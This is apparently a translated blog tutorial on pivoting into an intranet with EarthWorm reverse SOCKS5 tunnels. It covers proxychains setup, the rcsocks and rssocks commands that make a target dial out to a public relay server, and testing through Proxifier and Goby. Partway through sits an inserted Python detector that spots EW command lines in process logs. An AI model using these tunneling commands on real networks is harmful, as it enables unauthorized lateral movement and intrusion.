EW (EarthWorm) reverse socks5 proxy

 

Today I wanted to carry out lateral penetration into the school's intranet server for the first time in my life, but the situation did not allow it. At least I learned something, and I have to write it down and save it.

 

Tools:

EW: https://github.com/idlefire/ew

proxychains:  https://github.com/rofl0r/proxychains-ng

Xiaomi portable wifi:  http://bigota.miwifi.com/xiaoqiang/miniwifi/miwifi_setup_1b601_848.exe

phpstudy: https://m.xp.cn/

 

Machines:

Target machine ip: 192.168.31.20

Kali IP: 192.168.1.128

 

Since I couldn't use the school's intranet server, and I only had a laptop and a few virtual machines, and I happened to have a Xiaomi portable wifi, I thought about separating the laptop and the virtual machine into two intranet environments, so that the test environment is more realistic (in fact, it makes me feel happier). At the same time, for some unknown reason, the virtual machine cannot connect to the mobile hotspot. In order to experiment faster, I connected the local wifi to my own hotspot, and the virtual machine connected to the current router.

 

Step 1: win7 virtual machine configuration and preparation

Download the Xiaomi portable wifi installation package, install the win7 virtual machine, and plug the Xiaomi portable wifi into the laptop. An extra wifi connection will appear under the network connections; use it to connect to the router wifi. At the same time, the local machine connects to the mobile hotspot to ensure that the two are not in the same intranet environment. (If you have no external network card, you can skip this.)

Then start phpstudy on the target so that there is a web service to request when judging whether the proxy is successful.

 

Step 2: Kali virtual machine configuration

Configure proxychains

git clone https://github.com/rofl0r/proxychains-ng.git
cd proxychains-ng
./configure --prefix=/usr --sysconfdir=/etc
make && make install
make install-config

After the installation is successful, edit its configuration so that the proxy entry points to your public network IP and port

vi /etc/proxychains.conf

Change to

 

Step 3: EW reverse socks5 proxy

Server side

chmod +x ew_for_linux64
./ew_for_linux64 -s rcsocks -l 1080 -e 1024

Kali connects to port 1080 on the server, which corresponds to the port in the proxychains configuration. The target machine connects to port 1024 on the server, and the server relays the requests it receives on port 1080 to the target machine over the port 1024 connection.

 

 

Target machine (公网ip stands for the server's public IP)

ew_for_Win.exe -s rssocks -d 公网ip -e 1024

Note that the mode here is rssocks, not the rcsocks used on the server side. The first test failed because of this, and I spent a long time checking it o(╥﹏╥)o

 

Successful connection as shown in the figure

Server side

 

After that, Kali accesses the target machine through proxychains

proxychains4 curl 192.168.31.20

It can be seen that Kali is now able to access the target machine through the proxy. At this point, the test has been successfully completed.

After that you can happily carry out lateral penetration.
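
Seen from the defender's side, the two EW commands above leave a recognisable argument pattern in process-creation logs even when the binary has been renamed. The Python below is an added example, not part of the original post or of the EW project; the log records, host names, the renamed path and the documentation address 203.0.113.10 are constructed for illustration.

```python
import shlex

# Constructed process-creation records (host, command line) for illustration.
# 203.0.113.10 is a documentation address standing in for the public IP.
SAMPLE_EVENTS = [
    ("vps", "./ew_for_linux64 -s rcsocks -l 1080 -e 1024"),
    ("win7", "ew_for_Win.exe -s rssocks -d 203.0.113.10 -e 1024"),
    ("win7", r"C:\Temp\updater.exe -s rssocks -d 203.0.113.10 -e 1024"),  # renamed
    ("kali", "proxychains4 curl 192.168.31.20"),
    ("win7", "ping -s 4 192.168.31.1"),  # benign use of -s, must not match
]

# Options each mode needs, as used in the commands in this post.
REQUIRED = {"rcsocks": {"-l", "-e"}, "rssocks": {"-d", "-e"}}
ROLES = {"rcsocks": "relay listener", "rssocks": "reverse SOCKS client"}


def parse_ew_args(cmdline):
    """Return the EW-style options of a command line, or None if it does not match."""
    try:
        tokens = shlex.split(cmdline, posix=False)  # keep Windows backslashes
    except ValueError:  # unbalanced quotes in the logged command line
        tokens = cmdline.split()
    opts = {}
    for flag, value in zip(tokens[1:], tokens[2:]):
        if flag in ("-s", "-l", "-e", "-d"):
            opts.setdefault(flag, value)
    mode = opts.get("-s")
    if mode not in REQUIRED or not REQUIRED[mode].issubset(opts):
        return None
    return opts


def detect(events):
    """Flag tunnel endpoints by argument pattern, ignoring the binary name."""
    findings = []
    for host, cmdline in events:
        opts = parse_ew_args(cmdline)
        if opts:
            findings.append({
                "host": host,
                "role": ROLES[opts["-s"]],
                "peer": opts.get("-d"),         # server the client dials out to
                "listen_port": opts.get("-l"),  # port proxychains connects to
                "tunnel_port": opts["-e"],      # port shared by both ends
            })
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```
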

nmap scan

But if you set up the proxy directly on the local machine to access it, it will report an error that socks4 is not supported

I found the Windows proxy tool Proxifier and set up Google Chrome in it, so that Chrome uses this software as its proxy to access the intranet website. However, it always fails when proxying Goby.

[11.20 16:35:36] Goby.exe *64 - gobygo.net:443 ERROR: Failed to connect via proxy xxxx:1080 - The proxy closed the connection unexpectedly.

Sometimes there is data transfer, but most of the time it fails

 

Bow to the boss!

http://blog.leanote.com/post/snowming/ffa952c0096d

 


Origin blog.csdn.net/qq_40519543/article/details/109812961